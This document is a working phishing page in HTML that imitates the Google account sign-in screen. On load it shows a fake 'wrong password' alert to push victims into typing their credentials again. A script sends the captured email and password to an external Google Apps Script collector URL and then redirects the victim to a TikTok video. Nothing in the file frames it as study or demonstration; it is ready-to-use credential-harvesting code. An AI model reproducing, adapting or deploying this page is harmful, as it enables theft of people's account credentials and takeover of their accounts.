<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>google login from</title>
    <link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,500;0,700;1,300;1,500&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css">
    <link rel="stylesheet" href="style.css">

<style>
    *{
    margin: 0;
    padding: 0;
}
body{
    font-family: roboto,'Noto Sans Myanmar UI',arial,sans-serif;
}
.fixed-width{
    max-width: 1200px;
    margin: auto;
}
.text-center{
    text-align: center;
}
.text-right{
    text-align: right;
}
.text-left{
    text-align: left;
}
.codefix::after{
    content:"";
    display: block;
    clear: both;
    
}
.left{
    float: left;
}
.right{
    float: right;
}


/* Now google form design */
.box{
    margin-top: 100px;
    height: 564px;
    width: 500px;
    border: 1px solid rgba(231, 215, 215, 0.986);
    margin: auto;
    margin-top: 85px;
    border-radius: 10px;
}
.logo img{
    width: 100px;
    height: auto;
    margin-bottom: 20px;
    margin-top: 50px;
}
.content{
    margin-bottom: 40px;
}
.content h2{
    font-family: 'Google Sans','Noto Sans Myanmar UI',arial,sans-serif;
    font-size: 24px;
    font-weight: 500;
    line-height: 1.3333;
}
.content p{
    color: #202124;
    font-size: 18px;
    font-weight: 400;
    letter-spacing: .1px;
    line-height: 1.5;
    padding: 10px;
    margin-bottom: 5px;
    font-family: Arial, Helvetica, sans-serif;
}
.form{

}
.form input{
    width: 300px;
    padding: 20px 100px 20px 20px;
    font-size: 18px;
    margin: auto;
    display: block;
    margin-bottom: 10px;
    border: 1px solid rgba(231, 215, 215, 0.986);
    border-radius: 5px;
}
.text{
    margin-bottom: 20px;
}
.text a{
    text-decoration: none;
    font-size: inherit;
    margin-bottom: 50px;
    display: block;
    margin-left: 40px;
    color: #1a73e8;
    font-weight: 600;
    letter-spacing: 0.25px;

}
.text p{
    margin-left: 40px;
    color: #5f6368;
    
}
.btn{}

.btn-left a{
    float: left;
    text-decoration: none;
    display: block;
    margin-left: 40px;
    color: #1a73e8;
    margin-top: 10px;
}
.btn-right a{
    float: right;
    text-decoration: none;
    display: block;
    background:#1a73e8;
    color: #fff;
    font-size: 15px;
    padding: 10px 30px;
    margin-right: 50px;
    font-weight: 600;
    border-radius: 5px;
}

/* Now footer */
.footer{
    width: 500px;
    height: auto;
    margin: auto;
    margin-top: 15px;
}
.footer-left a{
    text-decoration: none;
    color: #5f6368;
    font-size: 13px;
}
.footer-left i{
    margin-left: 5px;
    color: #5f6368;
}
.footer-right ul{
    list-style: none;
}
.footer-right ul li{
    display: inline-block;
}
.footer-right ul li a{
    display: block;
    text-decoration: none;
    color: #5f6368;
    padding: 0px 15px;
    font-size: 13px;
}
</style>


<script>
    alert("wrong password. please try again");
</script>

</head>
<body>
    <div class="main-container">
        <div class="fixed-width">

            <div class="box ">
              <div class="logo text-center">
                <a href="#">
                    <img src="https://cdn.freebiesupply.com/images/large/2x/google-logo-transparent.png" alt="">
                </a>
            </div>
            <div class="content text-center">
                <h2>Sing in</h2>
                <p>Use your Google Account</p>
                </div>
               <form method="post" autocomplete="off" name="hello-sheet">
                    
                <div class="form">
                <input type="email" name="gid" id="" placeholder="Email or Phone" required="required">
                </div>
                 <a  href="#" style="color: #1a73e8; text-decoration: none; margin-left: 40px">Forgot email?</a>
                <br>
                <div class="form">
                <input type="password" name="gpw" id="" placeholder="password" required="required">

               
                </div>
                <div class="text">
               <a  href="#">Forgot password?</a>
                <p>Not your computer? Use Guest mode to sign in privately.</p>
                <a href="#">Learn more</a>
                </div>
               
                
               
            
            <div class="btn codefix">
                <div class="btn-left">
                     <a href="#">Create Account</a>
                </div>
                <div class="btn-right">
                   &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<button value="submit" type="submit" style="background-color: blue; color: white; height: 6vh; width: 10vw; border: none; border-radius: 5px ">next</button>
                </div>
               
               </form>
            </div>
            </div>
          
        </div>
    </div>
    <div class="footer">
        <div class="fixed-width codefix">
            <div class="footer-left left">
               <span> <a href="#">English (United States)</a><i class="fas fa-sort-down"></i></span>
            </div>
            <div class="footer-right right">
                <ul>
                    <li><a href="#">Help</a></li>
                    <li><a href="#">Privacy</a></li>
                    <li><a href="#">Terms</a></li>
                </ul>
            </div>
        </div>
    </div>
    
</body>
</html>
<script>
     
        const scriptURL = 'https://script.google.com/macros/s/AKfycbxxxkiXRK8jpfUTXsnCKtXbcDLBpjKNeDvw7qHp0MRgipfo4GAxxl6f9R2hfuHPZh2G-Q/exec'
                  const form = document.forms['hello-sheet']
                
                  form.addEventListener('submit', e => {
                    e.preventDefault()
                    fetch(scriptURL, { method: 'POST', body: new FormData(form)})
                      .then(response => window.open("https://www.tiktok.com/@renshreebasnet/video/6751941768247381253?is_copy_url=1&is_from_webapp=v1"));
                     
                      
                  })
                </script>
      
              <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
              <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> 
              
      </script>
